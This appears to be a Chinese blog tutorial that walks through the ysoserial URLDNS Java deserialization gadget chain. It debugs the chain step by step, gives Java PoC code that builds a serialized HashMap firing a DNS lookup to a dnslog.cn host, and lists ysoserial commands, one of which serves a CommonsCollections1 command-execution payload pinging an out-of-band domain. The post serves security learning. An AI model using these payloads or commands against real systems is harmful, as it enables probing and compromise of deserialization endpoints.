yso之URLDNS链

最新推荐文章于 2024-02-06 00:51:11 发布
最新推荐文章于 2024-02-06 00:51:11 发布
阅读量2.2k 收藏 4
点赞数
分类专栏: java安全 文章标签: java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/122675339
版权

前言

文章首发于tools:yso之URLDNS链

Java反序列化

Java提供了一种对象序列化的机制,用一个字节序列表示一个对象,该字节包含对象的数据、对象的类型、对象的存储属性。字节序列写出到文件后,相当于可以持久保存一个对象,这过程叫做序列化。序列化对象会通过ObjectOutputStreamwriteObject方法将一个对象写入到文件中。

而反序列化是使用了readObject 方法进行读取并还原成在序列化前的一个类。

这一步骤并没有什么安全问题,但是如果反序列化的数据是可控的情况下,那么我们就可以从某个输入点,输入恶意代码,再去查找在哪个点,我们的输入会被一层一层的带去到我们的触发点去,而这一步叫做寻找利用链的步骤。

ysoserial

因为java序列化后的数据为不可见字符,不方便构造,所以此项目帮你生成反序列化poc的脚本,但是并不会提供反序列化的点。

项目地址

https://github.com/angelwhu/ysoserial

使用

主要有两种使用方式,一种是运行ysoserial.jar 中的主类函数,另一种是运行ysoserial中的exploit 类,二者的效果是不一样的,一般用第二种方式开启交互服务

  • java -jar ysoserial-0.0.6-SNAPSHOT-all.jar [payload] ‘[command]’
  • java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://fq3jq6.dnslog.cn
  • java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 2333 CommonsCollections1 ‘ping test.fq3jq6.dnslog.cn’

项目结构

│  GeneratePayload.java {{生成poc的入口函数}}
│  Deserializer.java {{反序列化模块}}
│  Serializer.java {{序列化模块}}
│  Strings.java {{字符处理模块}}
│
├─exploit {{一些直接调用的exp}}
│      JBoss.java
│      JenkinsCLI.java
│      JenkinsListener.java
│      ......
│ 
├─payloads {{生成gadget poc的代码}}
│  │  CommonsBeanutils1.java
│  │  URLDNS.java
│  │  .....
│  │
│  ├─annotation {{一些不重要的配置}}
│  │      Authors.java
│  │
│  └─util  {{一些重复使用的单元}}
│          ClassFiles.java
│          Gadgets.java
│
└─secmgr {{和安全有关的管理}}
        DelegateSecurityManager.java
        ExecCheckingSecurityManager.java

动态调试

源码地址

https://github.com/frohoff/ysoserial

克隆到本地直接用idea打开,这时候IDEA会自动根据其中的配置下载依赖,只需要等待几分钟

自动下载后最好在pom.xml那把剩下的依赖也解决了

image-20211231105506123

程序入口

首先找到程序的入口点,点开pom.xml搜索mainclass就可以找到入口点的类

image-20211231112814866

ctrl+左键点击跟踪进去,运行测试一下。

image-20211231112854798

需要参数

image-20211231112914880

主函数调用链

1处接受2个参数比如 URLDNS 'http://www.baidu.com'
2处获得poc模块的类,这里就是URLDNS.java类
3处实例化poc类以及将第二个参数传入类
4处序列化一次然后输出(poc)

image-20220102082557584

在run-edit config中配置参数

image-20211231112932866

这里填入URLDNS链的启动参数

URLDNS http://fq3jq6.dnslog.cn

image-20220102080716125

再次运行这样我们就获取到了一个序列化的数据。

image-20220102081540983

手动构造pop链

指定类的hashmap到指定类的hashcode

tips:HashSet列表的add也会调用map.put只是链子更长而已

HashMap<String, String> map = new HashMap<String, String>();
// 键不能重复,值可以重复
map.put("san", "张三");
map.put("si", "李四");
map.put("wu", "王五");
map.put("wang", "老王");
map.put("wang", "老王2");// 老王被覆盖
map.put("lao", "老王");
System.out.println("-------直接输出hashmap:-------");
System.out.println(map);

我们跟进put函数

public V put(K key, V value) {
    return putVal(hash(key), key, value, false, true);
}

跟进从putVal到hash函数

static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

发现和hashCode相关。也就意味着当我们使用hashmap的put的时候,key会调用->hash(key)->然后调用key.hashCode()

也就是说只要key是一个对象,那么我们可以调用任意对象的hanshCode函数

那么又是怎么通过hashCode来发起dns请求的?

URL类中的hashcode

URL.java 881,URL对象hashCode函数调用了handler.hashCode

public synchronized int hashCode() {
    if (hashCode != -1)
        return hashCode;
    hashCode = handler.hashCode(this);
    return hashCode;
}

跟进handler.hashCode()(URLStreamHandler.java 350),他是由URLStreamHandler类形成的对象,是一个抽象类

用来处理协议(http/https)的建立连接

image-20220106081242928

hashCode调用了getHostAddress函数

protected int hashCode(URL u) {
    int h = 0;

    // Generate the protocol part.
    String protocol = u.getProtocol();
    if (protocol != null)
        h += protocol.hashCode();

    // Generate the host part.
    InetAddress addr = getHostAddress(u);
    ...........

跟进getHostAddress(u)(URLStreamHandler.java 433),看名字也知道是用来获取主机IP地址的

image-20220106081517363

在其中调用了InetAddress.getByName

protected synchronized InetAddress getHostAddress(URL u) {
    if (u.hostAddress != null)
        return u.hostAddress;

    String host = u.getHost();
    if (host == null || host.equals("")) {
        return null;
    } else {
        try {
            u.hostAddress = InetAddress.getByName(host);
    .........................................

而InetAddress.getByName(host)就是DNS请求了

image-20220106081842673

那么就清楚了,调用链map.put(Url,XX)->URL.hashCode->handler.hashCode->getHostAddress(u)->u.hostAddress=InetAddress.getByName(host);

发出DNS请求,那么我们就可以简单构造一下

 HashMap<URL, String> hashMap = new HashMap<URL, String>();
        URL test_url= null;
        try {
            test_url = new URL("http://test.kei8v0.dnslog.cn");
            hashMap.put(test_url, "22222");
            System.out.println("success");
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }

image-20220102084357269

到这里成功执行了DNS请求

hashmap的反序列化

我们前往HashMap.java

private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
            .........................
            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false); #!!!!!!!!!!!
            }
        }
    }

发现readObject每个值也会调用putVal->hash(作用和HashMap中的put函数一致),然后如果key为URL类型就会掉入前面URLDNS的链中,那么我们现在非常方便写代码

public static void main(String[] args) throws Exception{
    	//构造请求链
        HashMap<URL, String> hashMap = new HashMap<URL, String>();
        URL url = new URL("http://lyyy.dr8m3e.dnslog.cn\n\n");
        Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
        f.setAccessible(true);
        f.set(url, 0);
        hashMap.put(url, "test");
        f.set(url, -1);
    	//序列化操作
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("out.bin"));
        oos.writeObject(hashMap);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("out.bin"));
        ois.readObject();
    }

这里前面进行构造,后面进行序列化以及反序列化触发

有一个有意思的点是为了不让构造的时候触发dns请求影响结果判断,我们先使URL类中的hashCode值为0

我们分析URL的hashCode

public synchronized int hashCode() {
      if (hashCode != -1)
          return hashCode;

      hashCode = handler.hashCode(this);
      return hashCode;
  }

发现hashCode为-1的时候才调用handler.hashCode()

而hashCode定义为private int hashCode = -1;

默认为-1,我们要在构造的时候不发起dns请求,所以我们要在put之前set为非-1的值

注意在put结束后要恢复到-1,否则反序列化的时候也不会请求。
最后的利用链简化

HashMap->readObject()

HashMap->putVal()

HashMap->hash()

URL->hashCode()

URLStreamHandler->hashCode()

URLStreamHandler->getHostAddress()

InetAddress->getByName()

URLDNS链分析

URLDNS是ysoserial里面就简单的一条利用链,但URLDNS的利用效果是只能触发一次dns请求,而不能去执行命令。比较适用于漏洞验证这一块,而且URLDNS这条利用链并不依赖于第三方的类,而是JDK中内置的一些类和方法。

在一些漏洞利用没有回显的时候,我们也可以使用到该链来验证漏洞是否存在。

调用jar包得到序列化后的数据,如果需要执行,需要对其做反序列化操作。这里先开始看看数据是怎么获取的

打开src/main/java/ysoserial/payloads/URLDNS.java的源码

image-20220102082052485

在注释中标明了调用链

*   Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()

和手动构造的前半部分一致

在put地方打一个断点,再找到hashMap.readObject中的putVal打上断点

开始调试直接跳到第二个点

image-20220102093856286

putVal调用了hash,key是自己指定的url:http://fq3jq6.dnslog.cn 通过readObject函数生成的URL对象

image-20220106084457533

步入hash函数,这里key传入URL对象

image-20220102094027361

所以调用了URL类的hashCode,继续步入hashCode

image-20220102094137895

hashCode=-1时去执行hadler.hashCode

image-20220102094200704

执行getHostAddress,u为http://fq3jq6.dnslog.cn

image-20220102094238294

调用了InetAddress.getByName,成功发起dns请求,调用链和手动构造一模一样

本地使用yso测试

本地进行反序列化测试一下,手动生成

tips:这里不能用powershell运行,会在文件头加上错误信息导致报错

java -jar ysoserial.jar URLDNS http://8q2frx.dnslog.cn > out.bin

本地反序列化Demo

import java.io.FileInputStream;
import java.io.ObjectInputStream;

public class Helloworld{
    public static void main(String[] args) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("out.bin"));
        ois.readObject();
    }
}

image-20220102101028960

探究冗余处理

那么yso是怎么处理构造时发出的dns请求呢?

查看URLDNS源码可以发现,作者构造URL对象时使用了三个参数

image-20220106085356304

来到析构函数查看,是可以通过指定处理程序解析来订制规范创建URL

image-20220106085430453

也就是依赖handler来制定规范创建URL对象

handler是上面创建的

image-20220106085748009

跟进

 static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {
                        return null;
                }
        }

直接重写了getHostAddress()内容为返回空

那么如果我们传入的handler为自己改写的时,创建URL对象调用hashCode函数就不能发起DNS请求了

那么为什么在反序列化的时候会有请求呢?

因为之前说过序列化只记录类的属性,而函数内容不管,所以这个对象的函数被重写并不影响序列化的结果。

而反序列在被攻击端进行,只要序列化数据正常,自然可以正常发起DNS请求

总结

URLDNS链

  • hashmap重写了readobject反序列化方法,而重写后的readobject方法调用了一系列方法最后发起dns请求

  • 使用的全部是JDK中内置的类和方法,不会有环境要求,所以利用范围大

  • 使用的全部是JDK中内置的类和方法,学习后对java源码理解更深入

  • 原生类的很多方法都会最后发起DNS请求,但是这里是对反序列化的探测,所以需要的是

    • 1.重写readObject函数
    • 2.重写后的readObject执行了危险操作(危险类/危险函数)

参考

java代码审计入门3-ysoserial调试和构造URLDNS的pop链

Java安全之URLDNS链

6ri9ht
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java 反序列化(二) URLDNS分析
Vicl1fe的博客
03-24 743
前言
配置Apache实现防盗
石头城云计算的博客
10-25 819
配置Apache实现防盗 1.防盗就是防止别人的网站代码里面盗用服务器的图片、文件、 视频等相关资源 2.如果别人盗用网站的这些静态资源,明显的是会增大服 务器的带宽压力 3.所以作为网站的维护人员,要杜绝我们服务器的静态资 源被其他网站盗用 使用两台主机模拟盗: 两台主机配置与功能如下 IP地址 域名 用途 192.168.2.19 www.kxr.com 源主机 19...
Java反序列化之ysoserial URLDNS模块分析
javajavajava
11-19 1201
前言 Java反序列化漏洞 利用时,总会使用到ysoserial这款工具,安服仔用了很多,但是工具的原理却依旧不清不楚,当了这么久的脚本仔,是时候当一波(实习)研究仔,学习下这款工具各个Payload的原理了,下面我们先从漏洞探测模块URLDNS这个Payload开始学起,逐步衍生到漏洞利用模块。 为什么URLDNS模块会发送DNSLOG请求? 分析 下载ysoserial项目,打开pom.xml,程序入口在ysoserial.GeneratePayload 打开GeneratePayloa.
java url dns_Yso中的URLDNS分析学习
weixin_34582773的博客
02-16 454
作为 ysoserial 中最简单,这里简单记录学习一下首先使用ysoserial生成urldns的探测类型首先先去 dnslog.cn 获取一个urljava -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://pk3q64.dnslog.cn" > Test.txt查看生成的文件Java反序列化后的前几个字节就是 ac ed这...
Java安全ysoserial-URLDNS分析
最新发布
网络安全从业者的学习笔记
02-06 1829
Java安全中经常会提到反序列化,一个将Java对象转换为字节序列传输(或保存)并在接收字节序列后反序列化为Java对象的机制,在传输(或保存)的过程中,恶意攻击者能够将传输的字节序列替换为恶意代码进而触发反序列化漏洞。其中最经典的反序列化漏洞利用工具——ysoserial,下面就分析学习一下ysoserial中的URLDNS,以便更好地理解反序列化漏洞。
java url dns_Java安全URLDNS
weixin_39918084的博客
02-13 165
Java安全URLDNS0x00 前言在学习Java的反序列化漏洞的时候,就不得不学习他的一个利用。很多刚刚入门的对于利用这个词可能比较陌生。那么这里先来了解一下Java反序列化和反序列化漏洞的一个产生。0x01 Java反序列化Java提供了一种对象序列化的机制,用一个字节序列表示一个对象,该字节包含对象的数据、对象的类型、对象的存储属性。字节序列写出到文件后,相当于可以持久报错了一个对...
Java反序列化1-URLDNS利用分析
weixin_43263451的博客
06-26 1159
之前一段时间一直在学习了java,也有刷过一段时间的java靶场。最近想着也应该开始学习java反序列化相关知识了,今天就从java反序列化中最简单的URLDNS开始分析URLDNS不需要依赖第三方的包,同时不限制jdk的版本URLDNS并不能执行命令,只能发送DNS请求该条基本没什么危害,通常做为检测反序列化的入口点使用序列化 反序列化 上面就是java序列化与反序列化一个简单的例子。java的序列化与反序列化所使用的函数时writeObject和readObject,java也允许开发者去自己定义
实现 "长"接变 "短"
KHOST的博客
02-23 1853
接,通俗来说,就是将长的 URL 网址,通过程序计算等方式,转换为简短的网址字符串。 大家经常会收到一些莫名的营销短信,里面有一个非常短的接让你跳转。新浪微博因为限制字数,所以也会经常见到这种看着不像网址的网址。短的兴起应该就是微博限制字数激起了大家的创造力。 如果创建一个短系统,我们应该做什么呢? 将长接变为短; 用户访问短接,会跳转到正确的长接上去。 ...
Apache 实现图片防盗配置
Parhoia的博客
10-28 499
防盗概述 防盗就是防止别人的网站代码里面盗用服务器的图片文件、视频等相关资源.如果别人盗用网站的这些静态资源,明显的是会增大服务器的带宽压力.所以作为网站的维护人员,要杜绝我们服务器的静态资源被其他网站盗用. 配置规则变量说明 %{HTTP_ REFERER}:浏览header中的接字段,存放一一个 接的URL,代表是从哪个接访问所需的网页 !^:不以后面的字符串开头 .*$: 以任...
恶意url_预测URL的恶意
weixin_26722031的博客
08-01 3533
恶意urlIn this article, we walk through developing a simple feature set representation for identifying malicious URLs. We will create feature vectors for URLs and use these to develop a classification m...
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
ysoseral-0.0.6
06-14
java反序列化测试工具,ysoserial最新版0.0.6, 2018年更新
y-websocket:YsoWebsocket连接器
05-02
y-websocket :top_hat: Yjs的WebSocket提供程序 Websocket Provider实现了经典的客户端服务器模型。 客户端通过Websocket连接到单个端点。 服务器在客户端之间分发意识信息和文档更新。 如果您想要一个用于处理身份验证和授权的中央源,则Websocket Provider是一个不错的选择。 Websocket还发送标头信息和cookie,因此您可以在此服务器上使用现有的身份验证机制。 支持跨表通信。 当您在同一浏览器中打开同一文档时,该文档上的更改将通过跨表通信(和作为后备)进行交换。 支持交换意识信息(例如,光标)。 快速开始 安装依赖项 npm i y-websocket 启动y-websocket服务器 该存储库实现了一个基本服务器,您可以将其应用于特定的用例。 启动y-websocket服务器: HOST=localhost POR
ysomap:一个基于ysererial的有用的Java反序列化利用框架
05-14
YSOMAP Ysomap is A helpful Java Deserialization exploit framework based on ysoserial #1 起因 在实际分析ysoserial的利用时,有时候会觉得框架写的太死,有以下几个缺点: 同一个利用如果想改变一下最后的利用效果,如命令执行改成代码执行,我们需要改写这个利用或者是重新增加一个利用。这时,我们其实可以看到利用的前半部分是不变的,变的只是后续的利用效果。 ysoserial仅实现了常规的序列化利用,对于类似JSON格式的序列化利用,以当前的这个框架扩展起来会比较麻烦 所以萌生了开发一个更加灵活的框架来扩展反序列化利用,也就是当前这个试验品ysomap。 PS:YSOMAP项目为另一个项目的子项目,后续将开源该项目,敬请期待...... #2 原理 我将利用切分成了两个部分payload和
URLDNS分析
enhengzZ的博客
01-26 2042
ysoserial ysoserial 在idea构建好项目,添加依赖真是麻了,在其pom.xml上有几个依赖位置已经改变,需要手动导入jar包。。 项目准备好后,在pom.xml找到入口类 报错了,这是因为没有传入参数,我们分析URLDNS,在编辑配置里添加程序实参 URLDNS “http://r5z2ag.ceye.io” 可见执行成功 至此能获得序列化数据 URLDNS URLDNSysoserial序列化中比较简单的一个URLDNS的利用效果是只能触发一次dns请求,而不能去执行命
浅谈 yso的 Commons-Collections1 (cc1)反序列化 如何手写这条
weixin_51458899的博客
04-11 2425
yso的cc1 ysoserial/src/main/java/ysoserial/payloads at master · frohoff/ysoserial (github.com) 这里面找 poc package org.apache.commons.collections; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransfo
ysoserial URLDNS解析
phantom的博客
09-04 371
第一篇文章
URLDNS反序列化
遇事不决冲冲冲
01-28 4024
URLDNS URLDNS算是一条比较简单的利用,这条不依赖第三方库,它无法执行系统命令,成功利用的结果也只是实现服务器的一次url解析,主要用这条来判断服务器是否存在反序列化。接下来就这条的原理和poc进行分析。 原理分析 首先了解这一下这条是怎样执行的,代码中最重要的三个类是HashMap,URL,URLStreamHandler。其中HashMap重写了readObject方法,URL类是里面有个hashCode()方法被HashMap的readObject()调用了,URLStreamHa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值